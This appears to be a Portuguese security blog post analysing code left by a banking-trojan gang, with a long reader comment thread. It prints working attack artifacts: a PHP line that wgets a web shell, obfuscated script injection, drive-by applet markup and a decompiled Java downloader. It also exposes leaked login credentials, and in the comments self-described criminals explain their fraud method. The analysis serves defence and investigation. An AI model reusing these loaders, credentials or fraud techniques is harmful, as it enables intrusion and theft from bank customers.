Crackers expostos, investigação de quadrilha banker

No artigo anterior, Crackers invadem mais de 14 mil sites e deixam seus dados expostos, descobrimos muitas informações sensíveis relacionadas a crackers, expostas possivelmente devido à falha em alguma ferramenta automatizada de invasão.

Nesse artigo iremos analisar com mais detalhes as informações encontradas. É recomendável a leitura do anterior para melhor entendimento desse que será composto de trechos do código encontrado (em azul) que serão analisados e explicados separadamente.

Lembrando que esses dados foram obtidos porque um leitor do blog me avisou que um site apresentava  conteúdo estranho e ao analisá-lo acabei conseguindo extrair muitas informações, inclusive no final  serão apresentados os possíveis autores desse ato falho de invasão.

Sem mais demora vamos começar a análise dos códigos!

<? exec("wget http://rafaeltongol.com/2.txt;mv 2.txt wp-word.php"); ?>

A primeira coisa após a invasão é baixar um shell para ter controle total dos arquivos. Esse código faz download do arquivo 2.txt e renomeia para wp-word.php. O arquivo 2.txt é um shell PHP ou web shell conhecida como “WSO 2 Web Shell by oRb”, o código-fonte está disponível no Pastebin e esse nome wp-word.php é para tentar se passar por um arquivo do wordpress. A aparência desse shell é essa:


Drive-by download

<applet name="Flash Player 11" code="afp.class" 
archive="http://66.49.154.203/usage/.jar/java.php?a=afp.jar" width="1" height="1">
<param name="link" value="http://66.49.154.203/usage/.exe/download.php?a=FlashPlay.exe">
</applet>

Quando a página é carregada esse código faz com que seja solicitado o download de uma suposta atualização do Java que na verdade é um malware. O executável baixado é o FlashPlay.exe (guarde esse nome).

FlashPlay.exe (MD5: 16c7c8fa9c134c9d17ed517248d3d179)
Trojan-Downloader.VB (Sig-Id:1670965)

Esse por sua vez baixou o arquivo ipojoca.jpg.

ipojoca.jpg (MD5: 9f4ee3e208137c5c4779d68145347cfb)
Trojan-Spy.Win32.Banker (Sig-Id:1677149)

A príncipio não vou analisar manualmente esse malware já que o foco desse artigo é outro.

<? $auto_confi = base64_decode('PHNjcmlwdCBzcmM9Imh0dHA6Ly9
hbGluZXJvaWZmZS5jb20vc2l0ZS9wbHVnaW4uanMiPjwvc2NyaXB0Pg==');
echo $auto_confi;?>

Esse trecho decodifica uma string que está codificada em Base64, existem inúmeros sites que realizam esse processo de codificação-decodificação, como por exemplo o base64online.com. Essa string decodificada corresponde a:

<script src="http://alineroiffe.com/site/plugin.js"></script>

Javascript que nos remete ao próximo trecho de código.

<script src="http://alineroiffe.com/site/plugin.js"></script>

Exatamente o trecho anterior decodificado. O arquivo javascript plugin.js possui esse código:

document.write('<applet code="Microsoft_Corporation_Java_Virtual_Machine.class" archive="http://www.nucleosocial.com.br/images/GoogleUpdater.exe">
<PARAM NAME="mensagem" VALUE="Ok Funcionando perfeitamnte"></applet>');

A intenção desse código era criar um applet para solicitar o download do executável GoogleUpdater.exe assim que a página fosse carregada, mas o código está errado e não iria funcionar. Vamos entender um pouco mais como funciona esse código de applet que é muito utilizado para espalhar malwares através da técnica conhecida como Drive-by download.

Uma estrutura básica de applet seria assim:

<applet
      code=”AppletJava.class”
      archive=”Arquivos.jar”>

      <param name=”mensagem” value=”Hello World!”>
      <param name=”malware” value=”http://www.infected.com/malware.exe”>
</applet>

Applet é um mini programa escrito em Java que é embutido dentro de uma página HTML Vemos que dentro da tag applet há duas tags: code e archive. A tag code diz o nome da classe (entenda-se programa) a ser executado e a tag archive especifica onde está essa classe e todos os outros arquivos necessários para o applet funcionar.

Na tag archive é esperado um arquivo .JAR onde ficam “zipados” todos os arquivos do applet. Por fim as tags param são os parâmetros do applet, esses parâmetros são utilizados dentro do código. Por exemplo dentro do código do AppletJava.class pode ter uma função que pegue o valor do parâmetro malware e faça o download.

No código que estávamos analisando era esperado um .JAR mas havia um EXE, por isso não iria funcionar.

<script src="http://atelier3.jp/js/java.js"></script>

O javascript java.js possui esse código:

document.write('<applet code="Microsoft_Corporation_Java_Virtual_Machine.class" archive="http://www.nucleosocial.com.br/images/ScriptFail.jar" height="0" width="0">
<PARAM NAME="nome" VALUE="GoogleUpdate">
<PARAM NAME="local" VALUE="http://www.nucleosocial.com.br/images/GoogleUpdater.exe">
<PARAM NAME="mensagem" VALUE="Ok Funcionando perfeitamnte"></applet>');

Código para criação de um applet, vamos alinhá-lo para melhorar a visualização:

<applet
      code="Microsoft_Corporation_Java_Virtual_Machine.class"
      archive="http://www.nucleosocial.com.br/images/ScriptFail.jar"
      height="0" width="0">

      <PARAM NAME="nome" VALUE="GoogleUpdate">
      <PARAM NAME="local" VALUE="http://www.nucleosocial.com.br/images/GoogleUpdater.exe">
      <PARAM NAME="mensagem" VALUE="Ok Funcionando perfeitamnte">
</applet>

Agora sim vemos o JAR em archive, o que quer dizer que dentro de ScriptFail.jar haverá um arquivo chamado Microsoft_Corporation_Java_Virtual_Machine.class. Fiz o download do JAR e encontrei o class com esse nome. Descompilei com ajuda do site showmycode.com e o código que obtive foi esse:

import java.awt.Container;
import java.awt.EventQueue;
import java.io.*;
import java.net.URL;
import java.net.URLConnection;
import java.util.ResourceBundle;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.*;

public class Microsoft_Corporation_Java_Virtual_Machine extends JApplet
{

    public Microsoft_Corporation_Java_Virtual_Machine()
    {
    }

    public void init()
    {
        try
        {
            EventQueue.invokeAndWait(new  Object()     /* anonymous class not found */
    class _anm1 {}

);
        }
        catch(Exception ex)
        {
            ex.printStackTrace();
        }
    }

    private void initComponents()
    {
        jLabel1 = new JLabel();
        setName("Form");
        ResourceBundle bundle = ResourceBundle.getBundle("Bundle");
        jLabel1.setText(bundle.getString("Microsoft_Corporation_Java_Virtual_Machine.jLabel1.text"));
        jLabel1.setName("jLabel1");
        GroupLayout layout = new GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGap(28, 28, 28).addComponent(jLabel1, -2, 349, -2).addContainerGap(-1, 32767)));
        layout.setVerticalGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING).addGroup(layout.createSequentialGroup().addGap(131, 131, 131).addComponent(jLabel1, -2, 15, -2).addContainerGap(-1, 32767)));
    }

    private void load()
    {
        try
        {
            gravePermissao();
            System.out.println((new StringBuilder()).append("Local: ").append(getParameter("local")).toString());
            System.out.println((new StringBuilder()).append("Nome: ").append(getParameter("nome")).toString());
            file = new File((new StringBuilder()).append(System.getenv("TEMP")).append("\\").append(getParameter("nome")).append(".exe").toString());
            if((getParameter("local") != null) & (getParameter("nome") != null))
            {
                System.out.println("Verificando diretorio");
                System.out.println((new StringBuilder()).append("FileName: ").append(file.getAbsolutePath()).toString());
                if(!file.exists())
                {
                    url = new URL(getParameter("local"));
                    urlc = url.openConnection();
                    input = new BufferedInputStream(urlc.getInputStream());
                    out = new FileOutputStream(file);
                    byte buf[] = new byte[1024];
                    int len;
                    while((len = input.read(buf)) > 0) 
                        out.write(buf, 0, len);
                    out.close();
                }
            }
            if(file.exists())
            {
                Runtime.getRuntime().exec(file.toString());
                System.exit(0);
            }
            jLabel1.setText(getParameter("mensagem"));
        }
        catch(IOException iOException) { }
    }

    public void start()
    {
        init();
    }

    public void destroy()
    {
        System.exit(0);
    }

    private void gravePermissao()
    {
        if(System.getProperty("user.home") != null)
        {
            File file = new File((new StringBuilder()).append(System.getProperty("user.home")).append("\\c0d3.c4sh").toString());
            try
            {
                BufferedWriter out = new BufferedWriter(new FileWriter(file));
                out.write("/* AUTOMATICALLY GENERATED ON Tue Aug 10 13:19:39 BRT 2010*//* DO NOT EDIT */grant {  permission java.security.AllPermission;};");
                out.close();
            }
            catch(IOException ex)
            {
                Logger.getLogger(Microsoft_Corporation_Java_Virtual_Machine.getName()).log(Level.SEVERE, null, ex);
            }
        }
    }

    private File file;
    private OutputStream out;
    private URL url;
    private URLConnection urlc;
    private BufferedInputStream input;
    private static final String permissao = "/* AUTOMATICALLY GENERATED ON Tue Aug 10 13:19:39 BRT 2010*//* DO NOT EDIT */grant {  permission java.security.AllPermission;};";
    private JLabel jLabel1;


}

Dentro do código vemos os parâmetros sendo usados através da função getParameter(). O applet primeiro grava um arquivo no diretório do usuário com o nome de c0d3.c4sh e conteúdo:

/* AUTOMATICALLY GENERATED ON Tue Aug 10 13:19:39 BRT 2010*/
/* DO NOT EDIT */
grant { permission java.security.AllPermission;};

Esse comando grant serve para dar todas as permissões possíveis para rodar o applet, mas não entendi ao certo o porquê desse arquivo com esse conteúdo aí, talvez seja somente para testar se o applet está conseguindo gravar arquivos no computador da vítima.

Em seguida são utilizados os parâmetros para copiar o arquivo GoogleUpdater.exe da URL e salvar em %TEMP%\\GoogleUpdate.exe. Por fim o arquivo é executado.

Essa URL do GoogleUpdater.exe não estava mais ativa então não foi possível baixar o arquivo.

Identificando os autores

http://beta.statcounter.com/p7142950/entry_page/pageload/?url=http://www.cc.com/d.php
flashgame_co_cc
b470killer

O statcounter.com é um site de estatísticas de acesso para páginas web tipo o Google Analytics, permite saber quantas pessoas acessam seu site assim como de onde são, por onde chegaram, etc. Essa URL acima é para monitorar os acessos ao endereço http://www.cc.com/d.php. E as outras duas linhas são o usuário e a senha para fazer login no site de estatísticas.

Assim que é feito o login no statcounter.com é apresentada essa tela:


Vemos os últimos acessos à pagina http://www.cc.com/d.php. O que é esse d.php afinal? Um contador de infecções de malware. Esquema já conhecido onde um malware infecta um micro e acessa uma página para avisar que mais um caiu no golpe.

Vamos analisar a URL do contador.


Cada linha corresponde a uma instalação do malware, vemos o IP e provedor da vítima, país, cidade, data e hora. Usando como exemplo o acesso do Rio de Janeiro as variáveis que são passadas pela URL são:

http://www.cc.com/d.php?
name=Cavalo4 &
download=DOWN_OK &
run=5048 &
run2=0 &
user=Cleiide &
win=XP

Lembram do artigo anterior onde havia uma espécie de contabilidade mostrando quanto alguém devia ($) para cada membro do grupo? Os colaboradores do grupo lá tinham os nomes: Porrinha, Psychlo e Cavalo. Provavelmente essa variável name faz a distinção para saber de quem é o malware, nesse vemos que os acessos são do Cavalo, o 4 pode ser o tipo do malware.

Já a variável download deve ser uma flag para saber se o trojan conseguiu baixar suas pragas adicionais, prática comum do esquema cavalo de Troia. As variáveis run e run2 não sei dizer ao certo, talvez seja o PID do malware que foi executado na máquina da vítima. Por fim user e win são o usuário e a versão do Windows infectado.

Na figura abaixo vemos o gráfico de infecções de três dias, na quarta e sexta-feira o malware conseguiu se instalar em mais de 5.400 computadores.


Agora o mais interessante, ao acessar o menu Users e Profile do site de estatísticas, conseguimos ver o nome e e-mail do possível “gerente” desse esquema de distribuição de malwares.



Usuário: flashgame_co_cc
Nome: Marcos Alberto

Resumindo o esquema: o gerente possui os colaboradores Porrinha, Psychlo e Cavalo (deve ter mais), cada um deles é responsável por distribuir malwares diferentes e infectar o maior número de PCs possível. Cada malware quando se instala no computador da vítima acessa sua própria página de contador onde passa algumas informações como vimos acima e avisam que mais um foi infectado.

O gerente então acessa esses contadores e realiza o pagamento para cada colaborador de acordo com o número de infecções, no post anterior havia o valor de R$ 0,50 por infecção. Esse gerente por sua vez deve vender ou alugar serviços de botnets para terceiros, assim como dados de contas bancárias furtadas através dos malwares.

ssh baigiang@baigiang.bachkim.vn:baigiang

Vimos que havia inúmeros dados de acesso a servidores invadidos com usuários e senhas. Abaixo vemos destacados quatro arquivos suspeitos encontrados nesse servidor acima disponível através do ssh.


acesso.php


O código desse arquivo PHP está ofuscado com as funções eval(gzinflate(base64_decode())). Isso não é problema porque também existem sites que decodificam isso, novamente podemos usar o base64online.com. No final da página há um local específico para decodificar essas funções, submeti o código e o resultado pode ser visto no Pastebin.

Trata-se de um shell PHP “(c)oded by SnIpEr_SA,Developed by Ly0kha”, é uma versão do R57.


b0x.php


Como podemos ver esse é um PHP que funciona como sender de spam, isto é, phishings. Quando alguém tentar rastrear um e-mail phishing enviado por esse formulário chegará ao servidor baigiang.bachkim.vn o que não ajudaria muito na investigação, essa é uma forma que utilizam para dificultar o rastreamento. O código dele está no Pastebin.

caixa.php

É o mesmo arquivo b0x.php renomeado. 

worse.php

É um outro shell PHP com os dizeres “#worst @dal.net You have been hack By Shany with Love To #worst.”. O código dele também coloquei no Pastebin e sua aparência é essa:


Então vimos que havia quatro arquivos suspeitos, três shells PHP utilizados para gerenciar o servidor invadido e um spam sender. Realizando pesquisas sobre esses arquivos encontrei algo interessante que pode nos mostrar os responsáveis pela invasão e desfiguração desses 14 mil sites.

Através do Google encontrei um outro site (www.arquiweb.com.br) que possuía também esses quatro arquivos com os mesmos nomes e as mesmas funções, vejamos esse diretório:


Em vermelho os quatro arquivos mencionados, nota-se que cada um possui data de modificação diferente. Já os os arquivos destacados em verde possuem todos as mesma data de modificação e esse mesmo conteúdo:

Fatal Error HACKED !!!! by Elemento_pcx e s4r4d0 ! twitter ? @fatalerrorcrew ;*

Porém não é só isso, o código HTML da página esconde outra coisa:

<applet name="Adobe Flash Player 11" 
      code="adobeflash.class"
      archive="http://coroado.com.br/Arquivos/.Auto/adobeflash.jar"
      width="1" height="1">

      <param name="link" value="http://coroado.com.br/Arquivos/.Auto/FlashPlay.exe">
</applet>

Há um applet escondido que tenta salvar o arquivo FlashPlay.exe no computador da vítima. Um arquivo com esse nome a gente já conhece, lembra no início do post esse mesmo nome de arquivo sendo usado em outro applet?

Não tenho como provar que o MD5 dos dois é o mesmo já que esse está fora do ar, mas veja a data de modificação dos arquivos destacados em verde e do arquivo caixa.php encontrado no www.arquiweb.com.br, são as mesmas. Isso quer dizer que muito provavelmente quem modificou pela última vez esses arquivos foi a mesma pessoa.

Baseado nessas duas informações, o mesmo nome FlashPlay.exe sendo usado em applets e datas de modificações iguais, a ligação do incidente dos 14 mil sites invadidos com o grupo Fatal Error Crew se torna muito forte.

Ainda, esse grupo já é bem conhecido por defacements, invasões e ataques de DDoS perpetrados contra vários sites, uma rápida busca no Google nos mostra isso.

Parece que dessa vez alguma coisa deu errada por deixarem todas essas informações expostas. Caso a ligação entre o grupo e o incidente esteja confirmada isso nos mostra que além desses tipos de ataques mencionados eles também podem estar envolvidos com atividades bankers operando botnets para diversos fins: ataques DDoS, defacements, invasões, furto de contas bancárias, etc. Uma verdadeira quadrilha cibernética.

Agradeço os leitores Álisson e Ronildo que contribuíram com investigações paralelas do caso. Qualquer dúvida, sugestão ou conteúdo adicional só comentar.

Abraços!

74 comentários:

  1. Parabéns!!!

    Esse e-mail aparece também no registro de um domínio "prisionbreakers.net": http://www.webtrafficagents.com/Whois/prisonbreakbrasil.net

    ResponderExcluir
  2. Pow, muito legal Ronaldo, saiu informação pra caramba nessa investigação hehe :D Vai rolar uma análise do FlashPlay.exe? Talvez tenha algo interessante lá, tipo algum e-mail, servidor ftp, ou algo do gênero :D

    Abraço e parabéns!

    ResponderExcluir
  3. Olá... fiz uma análise crítica do servidor baigiang e encontrei informações interessantes (sou perito em Linux). Trata-se de um servidor CentOS de uma universidade vietinamita, que hospeda o projeto educacional TVTL, além de outros.

    Neste servidor tem um monte de VNCs abertos, vários arquivos com senhas e informações importantes para uma investigação sobre quem opera o servidor.

    Como posso enviar informações particulares, para que você decida o que ou não publicar?

    ResponderExcluir
  4. Agradeços os comentários pessoal!

    Anônimo[1],
    Interessante, teríamos que encontrar uma relação entre esse domínio e o e-mail.

    Álisson,
    Quem sabe, se você por aí conseguir mais informações também não deixe de publicar.

    Anônimo[2],
    Pode mandar para crimesciberneticos@ymail.com.

    Abraços!

    ResponderExcluir
  5. Com certeza Ronaldo. Interessante é que numa daquelas imagens que postei no .doc, tem uma cmd (php shell) do grupo Triad, cujo os membros provavelmente eram amigos do Fatal Error, pois são da mesma época do IRC, da rede gigachat, o que pode nos dar mais indícios de que eles (fatal error) estão por trás disso tudo.

    http://imageshack.us/photo/my-images/3/portadeentrada.png/

    Abraço :D

    ResponderExcluir
  6. Mais um excelente post, Ronaldo! Parabéns pelo trabalho..

    Sandro Süffert

    ResponderExcluir
  7. Eu finalmente consegui descobrir quem foi o DESOCUPADO que desativou meu auto infect ! Pouaaa que raiva vei, mas blz ja ta tudo online denovo e infectando muito...

    Outra coisa, percebi que vc nao entendeu pq o applet escreve um arquivo no sistema e o pq da permissao com o "grant".
    Eu te ensino ok?

    Basta eu jogar no Google que eu acho tudo que quero, caso alguém copie meu applet, eu consigo descobrir por onde ele anda ou aonde está sendo utilizado por algum amigo banker safado.
    Quanto a permissão, o meu exe tinha uma função que copiava o arquivo com outro nome para a pasta do java. Alterando o java.permission, com isso eu consigo rodar outro applet como se fosse de um banco para captar os dados da maquina, como macaddress, serial do hd, enfim todos os dados para poder entrar nas contas simulando o pc da vitima.

    Me deixem roubar em paz, obrigado.

    ResponderExcluir
    Respostas
    1. kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk quebrou os otários em 8
      kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

      Tamo Junto C4sh

      Forte abraço.

      Aconteça o que aconteça sempre restará um de nós (banker)

      Excluir
    2. SE OS PAÍSES ADOTASSEM A PENA DE MORTE POR INJEÇÃO LETAL (NÃO DE DLL!) PARA CRIMINOSOS COMO O VULGO "c0d3c4sh", METADE DOS PROBLEMAS JÁ ESTARIAM RESOLVIDOS.

      EM FRENTE COM O EXCELENTE TRABALHO COLEGA RONALDO.

      PAULO

      Excluir
    3. oww anonimo, deixa o cara pow, ele é foda msm seu otario, e o fdp aqui é tu, que morre pra ganhar mixaria, c0d3, tamo aqui toda hora

      Excluir
  8. Gostei! Ótimo trabalho.

    Confesso ter ficado contente com meus "minutinhos de fama" enquanto lia meu nome sendo no post.

    A internet é mesmo um lugar fantástico. Onde eu posso apreciar o trabalho de quem analisa o meu ;)

    Estou disponível no e-mail supracitado para conversas. Embora eu não me pinte de bom moço eu certamente gosto de conversar com pessoas interessantes.

    Coloca um google ads pelo menos nesse blog. Sei que você deve gostar do que faz mas fazer tudo de graça também é triste.

    Como alguns devem ter percebido essas coisas são meio antigas e os últimos nesse sistema datam de outubro no máximo.

    Eu, particularmente, trabalho em períodos específicos do ano e digo que nos próximos meses vamos aumentar as vendas de final de ano. Afinal, todos queremos passar o natal tranquilos.

    Eu posso deixar vazar algumas informações para vocês fazerem uns posts legais mas eu quero mais "fama". Me coloquem num blog mais importante. Me façam aparecer na TV?

    Hahahaha... Gostei do post.

    Espero aparecer de novo por aqui ;)

    Psychlo

    ResponderExcluir
    Respostas
    1. CARO PSYCOGRILO (RS), SE QUER APARECER NA TV, TIRE A ROUPA, PINTE SEU TRASEIRO ASQUEROSO DE VERMELHO E SAIA CORRENDO CANTANDO "TCHÊ, TCHERERE, TCHÊ, TCHÊ" NA 25 DE MARÇO.

      Excluir
  9. Ahhh, c0d3c4sh. Tá reclamando à toa. Eu tô sabendo que tu tá cheio da grana ae hahaha...

    Deixa os caras brincarem de CSI... Afinal, vai dizer que você não gosta desse reconhecimento?

    Mas vida de "cyber criminal" não é fácil não...

    O sistema já nasceu corrompido, quem insiste em defendê-lo e aceitá-lo nada mais é que um simples servo dos donos do dinheiro. A idéia desse sistema é tão absurda que dá certo!

    Eu não faço isso apenas pelo dinheiro. Faria mesmo que não ganhasse nada.

    Por que eu faço isso?
    Pelo simples prazer oras. E por que mais seria!?

    Pô... Vou dormir... Esse post me deu um UP... Nas próximas ferramentas que eu desenvolver que estiverem na "linha de frente" e que vocês terão acesso, vou colocar mensagens para vocês agradecendo o apoio. Vocês me motivaram a criar ferramentas melhores.

    Obrigado.

    ResponderExcluir
    Respostas
    1. "Por que eu faço isso? Pelo simples prazer oras."

      QUER PRAZER VAI DAR A BUNDA NO SEMÁFARO DA GUARULHOS.

      Excluir
  10. Grande analise Ronaldo! Continue postando mais informações sobre este caso, que se eu conseguir algo mais lhe envio.

    @off-topic: O bom é ver que os "espertinhos" gostaram do seu post e vieram agradecer. :D

    Foram "lammers" ao ponto de deixarem expostos todos estes dados e agora tentam dar uma de "crackers fodões" dizendo que deixaram de proposito! hahahahaha

    ResponderExcluir
  11. O maneiro é que os caras ainda confiam em proxy... não adianta filho não existe como ficar anônimo...

    Tudo depende da M em q vc ta se metendo, e qto a pessoa lesada vai ter $$ disponível para te achar!

    Pq se ela quiser ela te acha! Pode não ser em 24 horas... como nos filmes... mais ela te acha!

    ResponderExcluir
  12. Sensacional ronaldo!! muito bom!
    []'s
    Sergito

    ResponderExcluir
  13. HAUAHUhauahauHAUAHUh, hilário esses bankers! Dinheiro não se leva no caixão amigos!

    ResponderExcluir
  14. Olá, amigos.
    Acho engraçado vocês, os bonzinhos, nos responderem com ofensas e desrespeito. Acredito que nenhum de nós tenha dito ter sido deixado de propósito.

    De fato, foi uma falha. Uma falha sem consequências prejudiciais que embora o post seja grande, não existem informações sólidas suficientes para qualquer coisa. A análise, embora como eu disse tenha sido boa, foi superficial e viu pouco do que realmente e como acontece.

    Acho uma enorme arrogância subestimar a todos nós. Ainda mais quando mesmo após falhas grandes como essa não levam vocês a lugar nenhum. Respeito o trabalho de vocês e entendo que vocês acreditem estar defendendo uma causa que é o bem da sociedade.

    Infelizmente essa é uma causa falsa e inocente que não retrata a natureza das coisas. A idéia utópica de que a humanidade é civilizada só existe mesmo na teoria.

    Aliás, falando em teoria. Teoricamente todo computador é de certa forma rastreável. Na prática, existem sim métodos de total anonimato na internet.

    Hoje em dia talvez todos façamos muitas coisas erradas que não são consideradas erradas ainda. Um dia, quando a sociedade adotar novos padrões, muita coisa que você, eu e todos aqui fazem serão abominados e considerados como extremamente ruim e passível de punição.

    Acredito que isso acontecerá muito principalmente em relação ao meio ambiente, consumo, emissão de gases e etc.

    Mas aí eu já tô viajando demais.

    Abraço a todos.

    ResponderExcluir
    Respostas
    1. "Infelizmente essa é uma causa falsa e inocente que não retrata a natureza das coisas. A idéia utópica de que a humanidade é civilizada só existe mesmo na teoria."

      QUEM LÊ TODO ESTE SEU FILOSOFISMO DEVE PENSAR QUE VOCÊ É UMA PESSOA COM BOM DESENVOLVIMENTO MENTAL, O QUE NÃO É O CASO. VOCÊ SERIA ÚTIL PARA A SOCIEDADE SE O TEMPO QUE PERDE FURTANDO OS OUTROS GANHASSE DESENVOLVENDO UMA VACINA PARA A CURA DE ALGUMA DOENÇA OU A SOLUÇÃO PARA ALGUM PROBLEMA MUNDIAL. REFLITA SOBRE ISTO!

      Excluir
    2. "Na prática, existem sim métodos de total anonimato na internet."
      O líder e integrantes relevantes da quadrilha de cyber criminosos LulSec pensavam exatamente como você e veja no que deu. Agora, que eles foram capturados, estão estudando uma forma de executá-los através da pena de morte ou eles virem a morrer de algum acidente Rsrs

      Ass.
      Paulo

      Excluir
  15. HAUAHUhauahauHAUAHUh [2].

    Aos ladrões:

    Mas falando sério, vocês são em quantos nesse esquema fraudulento? Tem chefe e tudo mais (estilo tribo indígena)?

    Grato pela compreensão dos amigos!

    Grande abraço à todos! =)

    ResponderExcluir
    Respostas
    1. "estilo tribo indígena"
      Sim, eles são como em tribos indígenas, mas não fumam maconha de forma ritualística.


      Ass.
      Paulo

      Excluir
  16. Agradeço os comentários de todos, como eu já disse em outra oportunidade esse espaço pode ser utilizado para qualquer opinião, favorável ou não, só não aceito palavrões e ofensas pessoais.

    A discussão civilizada sempre é saudável e estimula o desenvolvimento.

    Caros colegas do "lado negro da força", a parte tecnológica de vocês eu acho legal conhecer e respeito mas a parte ética infelizmente não.

    O que nunca vou concordar nesses casos é que vocês estão roubando (furtando na verdade) dinheiro de pessoas inocentes, que não tem nada a ver com nada. Imagine um cara que ralou o mês inteiro, ganhou seus 1000 reais de salário para sustentar uma família de um monte de filhos chega lá pra sacar seu dinheiro e não encontra nada porque vocês furtaram.

    O cara não tem nada a ver com o sistema, capitalismo, governo, seja lá o que for, só quer comprar alimento para sua família e ter uma vida normal. Tudo bem que os bancos na maioria das vezes vão reembolsar ele mas imagina o transtorno, e isso faz com que os bancos (onde muitas outras pessoas honestas também trabalham) aumente tarifas e a gente que paga a conta novamente.

    Bem, mas esse questão ética cada um tem a sua.

    Como você disse fazer por prazer então seria mais proveitoso e honesto vocês trabalharem como programadores, pentesters, sysadmin, procurando vulnerabilidades em sistemas e vendendo para as empresas, etc. Isso é algo bastante desafiador e prazeroso pra quem consegue, e dá dinheiro.

    De qualquer forma vocês também ajudaram a promover o blog e só estão aumentando os acessos, quanto ao google adsense já usei uma vez mas paga muito pouco, quando crescer um pouco mais vou estudar outras formas de publicidade.

    Resumindo: acho até legal essa briga de gato e rato entre o pessoal de segurança e os black hats pois estimula o desenvolvimento e a pesquisa, mas desde que não prejudique pessoas inocentes.

    E não desativei nada, não altero nada do que encontro apenas leio e copio para analisar depois. Quando cabível aviso o responsável pelo site sobre o problema mas não foi esse caso.

    E cuidado, um vacilo e a PF pode aparecer por aí, o risco não compensa.

    Abraços!

    ResponderExcluir
  17. Leiam :)
    http://pastebin.com/mL46X1sF

    ResponderExcluir
  18. Bom galera, não posso negar que vocês bankers escrevem bem e tentam expor suas opiniões de forma bem convincente, porém não podemos ler esse desabafo, ficar impressionados e achar que nós que não roubamos, somos causadores de danos a terceiros (mesmo sem saber, segundo vocês) e que no final do filme, vocês não são "lá tão malandros". Roubar é malandragem e é crime, tanto aqui no mundo virtual quanto aí na rua, num assalto, por exemplo.
    Grande abraço e fiquem com Deus!

    ResponderExcluir
  19. Este post está interessante não só por seu conteúdo, mas também pelos comentários que dele derivaram.

    Ronaldo, parabéns pela iniciativa!

    []s

    ResponderExcluir
  20. Na minha opinião as fraudes bancárias pela Internet afetam sim muita gente, o Psychlo pode não conhecer alguém que tenha sido vítima mas eu conheço 3 pessoas que tiveram suas contas zeradas. E conhecidos de conhecidos também já me relataram casos semelhantes.

    Hoje mesmo chegou um leitor no blog através da pesquisa "rasparam minha conta bancaria".

    A FEBRABAN disse que é em 2010 foram 900 milhões de reais em perdas com esses casos. A PF disse que em média são retirados 900 reais de cada conta furtada:

    http://www.crimesciberneticos.com/2011/01/noticia-fraudes-bancarias-pela-internet.html

    No blog tem um vídeo que fiz de um golpe que deve ter faturado bem também:

    http://www.crimesciberneticos.com/2010/10/video-ladroes-de-banco-online-veja-como.html

    Abraços!

    ResponderExcluir
    Respostas
    1. "...as fraudes bancárias pela Internet afetam sim muita gente...eu conheço 3 pessoas que tiveram suas contas zeradas."

      E o problema Ronaldo é que agora não são só quadrilhas virtuais, há quadrilhas infiltradas nos próprios bancos.

      Paulo

      Excluir
  21. Eu acho que uma coisa é explorar vulnerabilidade de sistemas, e fazer dafaces em sites do governo por uma ideologia, outra é roubar pessoas inocentes que nao tem nada a ver...creio que esse segundo esta mais para um ladrão e deve ser punido como tal.

    ResponderExcluir
    Respostas
    1. Tenha em mente que acesso não autorizado, invasão e defacement, também são crimes.

      Paulo

      Excluir
  22. Invadam por gosto.
    Se puderem ganhar algum melhor ainda.

    Vai sempre haver ladrões e policias, invasor e segurança.
    Se cada um gosta da sua posição, então ambos estão bem.

    fikem bem!
    c0d3c4sh

    ResponderExcluir
  23. Ha ha...
    http://i.imgur.com/YiiZ7.jpg

    ResponderExcluir
  24. Vim aqui esclarecer que o Grupo Fatal error não tem nenhum envolvimento com atividades banker , defacer e por diversão :)
    Não prejudicamos apenas alertamos...
    Caso alguém venha nos clonar e se dizer banker e prejudicar e fácil ele cair. #ficadica

    abrss Fatal Error Crew 2001 ^ 2011

    ResponderExcluir
    Respostas
    1. "Não prejudicamos apenas alertamos..."
      Ah, é? E alertam como? Na forma da lei ou pichando a página?
      No mínimo, você é integrante da quadrilha de cyber criminosos "Fatal Error".

      Ass.
      Paulo

      Excluir
  25. Resposta ao c0d3c4sh:

    Roubar, a curto ou longo prazo, vai acabar mal, sem change de acabar bem ou de forma amistosa :/

    Só gostaria que vocês abrissem os olhos enquanto há tempo!

    Abraços!

    ResponderExcluir
  26. Olha eu aqui novamente, mais loko que nunca e pra variar não fui preso ainda opasokpasopkasokpas !
    ;)

    Seguinte cambada de desinformados que assistem a globo me chamar de pirata da internehhh, o ultimo comentário supostamente feito por mim esse aqui:

    "Invadam por gosto.
    Se puderem ganhar algum melhor ainda."

    Hahahaha eu não escrevi nada disso, alguém colocou meu nick e postou o comment, fAil.

    Segundo, respondendo ao anonimo:

    Acabar bem ? Forma Amistosa ?
    Brasileiro é um povo FUD*** que não sabe absolutamente de nada. Assista mais a globo e seja manipulado mentalmente pro resto de sua vida inútil.

    Abrir o olho? uhauhauhauha faz me rir kiddiot, abra você antes de acessar sua conta online.
    Isso daki da mais dinheiro que o tráfico de drogas manolo !

    Em breve novidades !

    ResponderExcluir
    Respostas
    1. Você dá a entender que as pessoas que assistem a Globo, são mentalmente manipuladas, agora, me responda uma coisa:
      Quem manipula a sua mente estreita para cometer estes crimes?

      Excluir
  27. Não quero saber quem rouba ou quem defende, sistema falido temos sim! Não vai ser ninguém aqui que pode vai mudar isso, já viro um câncer so esperando o dia pra enterra, não me venha com esse papo que podemos mudar o que sou certinho, ninguém é certo nesse pais se vc tentar ser certo é poque tem um voz la no fundo falando pra vc fez coisa errada. Não importa se tiro dinheiro de um pai de família que ganha 1 mil reais por mês, ele tem culpa sim, foi ele e um bando de pessoa que nem ele tem não tem a capacidade de para pra pensar um segundo e fala assim: Em Quem Voto? E acaba se vendendo por um nada.Isso é problema dele, todo mundo pode melhor sua situação se usar a cabeça de cima pra pensar e para de usar a de baixo pra fazer filho e coloca nas favela, pessoas essas que nao tem capacidade bancar a sim próprios.

    Transtorno quem causa e o governo e a corja que ta lá fazendo nada... Morte ao politico.

    Sou a favor da lei robin hood, afinal no fim de tudo que paga é o banco. Não quer ser roubado não use a tecnologia.

    Sou exite o esperto pq existo o bobo.

    Inferno.BR

    ResponderExcluir
    Respostas
    1. Nunca li tanta merda junta, tentou se justificar e mostrou que é um tremendo bunda mole!

      Obs: Estude mais, seu português é sofrível!

      Excluir
